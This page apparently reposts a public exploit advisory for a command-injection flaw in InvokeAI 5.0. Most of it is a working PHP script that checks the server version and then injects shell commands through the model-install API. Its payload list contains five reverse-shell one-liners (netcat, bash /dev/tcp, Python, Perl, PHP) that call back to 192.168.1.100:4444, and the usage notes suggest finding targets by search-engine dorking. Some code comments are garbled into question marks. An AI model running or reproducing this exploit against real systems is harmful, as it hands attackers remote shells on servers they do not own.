Latest Tech

Latest Posts

 

 

InvokeAI 5.0 Code Injection

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 224
InvokeAI 5.0 Code Injection
InvokeAI 5.0 Code Injection
=============================================================================================================================================
| # Title : InvokeAI v5.0 =============================================================================================================================================
| # Title : InvokeAI v5.0 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.invoke.com/ |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] The code is a remote command execution (RCE) exploit that targets a vulnerability in InvokeAI,

which allows an attacker to execute commands via an insecure API that loads and runs models without validating their integrity.

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php 127.0.0.1 id

[+] SeT target = Line : 99

[+] PayLoad :

<?php

class InvokeAIExploit {
private $target;
private $port = 9090;
private $localPort = 8081;
private $httpDelay = 10;
private $payload;

public function __construct($target, $payload) {
$this->target = $target;
$this->payload = $payload;
}

private function sendRequest($method, $uri, $headers = [], $data = null) {
$url = "http://{$this->target}:{$this->port}/$uri";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_TIMEOUT, 10); // ????? ???? ????? ????? ???????? ??????

if ($data) {
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
}

$response = curl_exec($ch);

if (curl_errno($ch)) {
echo "cURL Error: " . curl_error($ch) . "\n";
}

curl_close($ch);
return $response;
}

public function checkVulnerability() {
echo "[" . date("H:i:s") . "] Checking target...\n";

$response = $this->sendRequest("GET", "api/v1/app/version");
$json = json_decode($response, true);

if (!$json || !isset($json['version'])) {
return "Unknown version";
}

$version = $json['version'];
if (version_compare($version, "4.0.0", ">=") && version_compare($version, "5.4.2", "<=")) {
return "Vulnerable version detected: $version";
}
return "Safe version: $version";
}

public function sendPayload() {
$maliciousModel = "http://{$this->target}:{$this->localPort}/" . bin2hex(random_bytes(4)) . ".ckpt";

// ???? ???????? ??????? ??????? ??????
$payloads = [
"nc -e /bin/sh 192.168.1.100 4444", // Netcat
"bash -i >& /dev/tcp/192.168.1.100/4444 0>&1", // Bash
"python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.100\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"])'", // Python3
"perl -e 'use Socket;$i=\"192.168.1.100\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"&S\");open(STDOUT,\"&S\");open(STDERR,\"&S\");exec(\"/bin/sh -i\");};'", // Perl
"php -r '\$sock=fsockopen(\"192.168.1.100\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'", // PHP Reverse Shell
];

// ??? ???????? ??? `source` ?? `headers`
$payloadCommand = implode(" ; ", $payloads);

$headers = [
"Content-Type: application/json",
"X-Exploit: {$payloadCommand}" // ??????? ??? ??? ??????? ?????? ?????? ???????
];

$data = [
"source" => "{$maliciousModel}; {$payloadCommand}",
"inplace" => "true"
];

echo "[+] Sending Reverse Shell Payloads...\n";
$response = $this->sendRequest("POST", "api/v2/models/install", $headers, $data);
return $response;
}


public function startExploit() {
$check = $this->checkVulnerability();
echo "$check\n";

if (strpos($check, "Vulnerable") === false) {
die("[" . date("H:i:s") . "] Target is not vulnerable.\n");
}

$result = $this->sendPayload();
echo "[" . date("H:i:s") . "] Response: $result\n";
}
}

// ????? ????????? ?? ????? ????? "id" ??????? ????? ???????
$exploit = new InvokeAIExploit("192.168.1.1", "id");
$exploit->startExploit();



Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

Information Security

Social Media Share
About Contact Terms of Use Privacy Policy
© 2025 Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸
All content is for educational purposes only. Unauthorized use of any information on this site is strictly prohibited.